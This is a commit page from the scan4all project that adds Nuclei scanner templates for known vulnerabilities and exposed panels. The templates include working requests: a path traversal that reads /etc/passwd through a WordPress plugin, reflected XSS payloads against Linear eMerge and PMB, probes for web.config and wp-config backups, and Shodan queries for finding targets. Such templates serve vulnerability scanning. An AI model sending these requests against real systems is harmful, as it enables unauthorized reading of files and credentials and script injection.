crash.software
Projects
Pull Requests
Issues
Builds
scan4all
Code
Files
Commits
Branches
Tags
Pull Requests
Code Comments
Code Compare
Issues
Builds
Statistics
Child Projects
cra.sh
RESTful API
Projects STRLCPY scan4all Commits c8e13f02
🤬
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2015/CVE-2015-5469.yaml
     1 +id: CVE-2015-5469
     2 +info:
     3 + name: Wordpress MDC YouTube Downloader plugin v2.1.0 - Remote file download
     4 + author: 0x_Akoko
     5 + severity: high
     6 + description: Absolute path traversal vulnerability in the MDC YouTube Downloader plugin 2.1.0 for WordPress allows remote attackers to read arbitrary files via a full pathname in the file parameter to includes/download.php.
     7 + reference:
     8 + - https://www.openwall.com/lists/oss-security/2015/07/10/5
     9 + - https://www.cvedetails.com/cve/CVE-2015-5469/
     10 + - http://www.vapid.dhs.org/advisory.php?v=133
     11 + - http://www.openwall.com/lists/oss-security/2015/07/10/5
     12 + classification:
     13 + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     14 + cvss-score: 7.5
     15 + cve-id: CVE-2015-5469
     16 + cwe-id: CWE-22
     17 + tags: cve,cve2015,wp,lfi
     18 + 
     19 +requests:
     20 + - method: GET
     21 + path:
     22 + - "{{BaseURL}}/wp-content/plugins/mdc-youtube-downloader/includes/download.php?file=/etc/passwd"
     23 + 
     24 + matchers-condition: and
     25 + matchers:
     26 + 
     27 + - type: regex
     28 + regex:
     29 + - "root:[x*]:0:0"
     30 + 
     31 + - type: status
     32 + status:
     33 + - 200
     34 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2019/CVE-2019-7255.yaml
     1 +id: CVE-2019-7255
     2 + 
     3 +info:
     4 + name: Linear eMerge E3 - Cross Site Scripting
     5 + author: arafatansari
     6 + severity: medium
     7 + description: |
     8 + Linear eMerge E3-Series devices allow XSS via layout parameter.
     9 + reference:
     10 + - https://www.applied-risk.com/resources/ar-2019-005
     11 + - https://packetstormsecurity.com/files/155253/Linear-eMerge-E3-1.00-06-Cross-Site-Scripting.html
     12 + - https://nvd.nist.gov/vuln/detail/CVE-2019-7255
     13 + - https://applied-risk.com/labs/advisories
     14 + classification:
     15 + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     16 + cvss-score: 6.1
     17 + cve-id: CVE-2019-7255
     18 + cwe-id: CWE-79
     19 + metadata:
     20 + shodan-query: http.title:"eMerge"
     21 + verified: "true"
     22 + tags: emerge,xss,packetstorm,cve,cve2019,nortek
     23 + 
     24 +requests:
     25 + - method: GET
     26 + path:
     27 + - "{{BaseURL}}/badging/badge_template_v0.php?layout=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
     28 + 
     29 + matchers-condition: and
     30 + matchers:
     31 + - type: word
     32 + part: body
     33 + words:
     34 + - 'Template : <script>alert(document.domain)</script>'
     35 + 
     36 + - type: word
     37 + part: header
     38 + words:
     39 + - text/html
     40 + 
     41 + - type: status
     42 + status:
     43 + - 200
     44 + 
  • ■ ■ ■ ■
    config/nuclei-templates/cves/2022/CVE-2022-2383.yaml
    skipped 11 lines
    12 12   - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2383
    13 13   - https://nvd.nist.gov/vuln/detail/CVE-2022-2383
    14 14   classification:
     15 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     16 + cvss-score: 6.1
    15 17   cve-id: CVE-2022-2383
     18 + cwe-id: CWE-79
    16 19   metadata:
    17  - verified: true
     20 + verified: "true"
    18 21   tags: wp,wordpress,wp-plugin,wpscan,cve,cve2022,xss
    19 22   
    20 23  requests:
    skipped 20 lines
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2022/CVE-2022-34328.yaml
     1 +id: CVE-2022-34328
     2 + 
     3 +info:
     4 + name: PMB 7.3.10 - Cross Site Scripting
     5 + author: edoardottt
     6 + severity: medium
     7 + description: |
     8 + PMB 7.3.10 allows reflected XSS via the id parameter in an lvl=author_see request to index.php.
     9 + reference:
     10 + - https://github.com/jenaye/PMB/blob/main/README.md
     11 + - https://nvd.nist.gov/vuln/detail/CVE-2022-34328
     12 + - https://github.com/jenaye/PMB
     13 + classification:
     14 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     15 + cvss-score: 6.1
     16 + cve-id: CVE-2022-34328
     17 + cwe-id: CWE-79
     18 + metadata:
     19 + shodan-query: http.html:"PMB Group"
     20 + verified: "true"
     21 + tags: cve,cve2022,pmb,xss
     22 + 
     23 +requests:
     24 + - method: GET
     25 + path:
     26 + - "{{BaseURL}}/index.php?lvl=author_see&id=42691%27%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
     27 + 
     28 + matchers-condition: and
     29 + matchers:
     30 + - type: word
     31 + part: body
     32 + words:
     33 + - "<script>alert(document.domain)</script>' target='cart_info"
     34 + 
     35 + - type: word
     36 + part: header
     37 + words:
     38 + - text/html
     39 + 
     40 + - type: status
     41 + status:
     42 + - 200
     43 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/exposed-panels/eMerge-panel.yaml
     1 +id: eMerge-panel
     2 + 
     3 +info:
     4 + name: Nortek Linear eMerge - Panel Detect
     5 + author: arafatansari
     6 + severity: info
     7 + metadata:
     8 + verified: true
     9 + shodan-query: http.title:"eMerge"
     10 + tags: panel,emerge,nortek
     11 + 
     12 +requests:
     13 + - method: GET
     14 + path:
     15 + - "{{BaseURL}}"
     16 + 
     17 + matchers-condition: and
     18 + matchers:
     19 + - type: regex
     20 + part: body
     21 + regex:
     22 + - '<title>(.*)Linear eMerge(.*)</title>'
     23 + - '/emerge.ico'
     24 + condition: or
     25 + 
     26 + - type: status
     27 + status:
     28 + - 200
     29 + 
  • ■ ■ ■ ■
    config/nuclei-templates/exposures/configs/web-config.yaml
    skipped 1 lines
    2 2   
    3 3  info:
    4 4   name: Web Config file
    5  - author: Yash Anand @yashanand155
     5 + author: Yash Anand @yashanand155,DhiyaneshDK
    6 6   severity: info
     7 + reference: https://github.com/imhunterand/ApachSAL/blob/main/assets/exploits.json
    7 8   tags: config,exposure
    8 9   
    9 10  requests:
    10 11   - method: GET
    11 12   path:
    12 13   - '{{BaseURL}}/web.config'
     14 + - '{{BaseURL}}/../../web.config'
    13 15   
    14 16   matchers-condition: and
    15 17   matchers:
    skipped 6 lines
    22 24   - type: status
    23 25   status:
    24 26   - 200
     27 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/misconfiguration/aem/aem-osgi-bundles.yaml
     1 +id: aem-osgi-bundles
     2 + 
     3 +info:
     4 + name: Adobe AEM Installed OSGI Bundles
     5 + author: dhiyaneshDk
     6 + severity: low
     7 + reference:
     8 + - https://www.slideshare.net/0ang3el/hacking-aem-sites
     9 + metadata:
     10 + shodan-query:
     11 + - http.title:"AEM Sign In"
     12 + - http.component:"Adobe Experience Manager"
     13 + tags: misconfig,aem,adobe
     14 + 
     15 +requests:
     16 + - method: GET
     17 + path:
     18 + - "{{BaseURL}}/bin.tidy.infinity.json"
     19 + 
     20 + matchers-condition: and
     21 + matchers:
     22 + - type: word
     23 + words:
     24 + - '"jcr:primaryType":'
     25 + - '"jcr:uuid":'
     26 + condition: and
     27 + 
     28 + - type: status
     29 + status:
     30 + - 200
     31 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/misconfiguration/aws-s3-explorer.yaml
     1 +id: aws-s3-explorer
     2 + 
     3 +info:
     4 + name: AWS S3 Explorer
     5 + author: DhiyaneshDk
     6 + severity: low
     7 + reference:
     8 + - https://www.exploit-db.com/ghdb/7967
     9 + metadata:
     10 + verified: true
     11 + google-dork: inurl:s3.amazonaws.com intitle:"AWS S3 Explorer"
     12 + tags: s3,edb,misconfig,aws,amazon
     13 + 
     14 +requests:
     15 + - method: GET
     16 + path:
     17 + - "{{BaseURL}}/index.html"
     18 + 
     19 + matchers-condition: and
     20 + matchers:
     21 + - type: word
     22 + words:
     23 + - '<title>AWS S3 Explorer</title>'
     24 + 
     25 + - type: word
     26 + part: header
     27 + words:
     28 + - text/html
     29 + 
     30 + - type: status
     31 + status:
     32 + - 200
     33 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/technologies/zap-api-detect.yaml
     1 +id: zap-rest-api-detect
     2 + 
     3 +info:
     4 + name: ZAP Rest API Server Running
     5 + author: hahwul
     6 + severity: info
     7 + reference:
     8 + - https://www.zaproxy.org/docs/api/
     9 + tags: zap,tech
     10 + 
     11 +requests:
     12 + - method: GET
     13 + path:
     14 + - "{{BaseURL}}"
     15 + 
     16 + matchers:
     17 + - type: word
     18 + part: response
     19 + words:
     20 + - '<title>ZAP API UI</title>'
     21 + - 'Welcome to the OWASP Zed Attack Proxy (ZAP)'
     22 + - 'Access-Control-Allow-Headers: ZAP-Header'
     23 + condition: or
  • ■ ■ ■ ■ ■
    config/nuclei-templates/vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml
    skipped 1 lines
    2 2   
    3 3  info:
    4 4   name: WordPress wp-config Detection
    5  - author: Kiblyn11,zomsop82,madrobot,geeknik,daffainfo,r12w4n
     5 + author: Kiblyn11,zomsop82,madrobot,geeknik,daffainfo,r12w4n,tess
    6 6   severity: medium
    7 7   description: WordPress `wp-config` was discovered. This file is remotely accessible and its content available for reading.
    8 8   classification:
    skipped 23 lines
    32 32   - '{{BaseURL}}/wp-config.php~'
    33 33   - '{{BaseURL}}/wp-config.php-backup'
    34 34   - '{{BaseURL}}/wp-config.php.orig'
     35 + - '{{BaseURL}}/wp-config.php_orig'
    35 36   - '{{BaseURL}}/wp-config.php.original'
    36 37   - '{{BaseURL}}/_wpeprivate/config.json'
    37 38   
    skipped 16 lines
Please wait...
Page is in error, reload to recover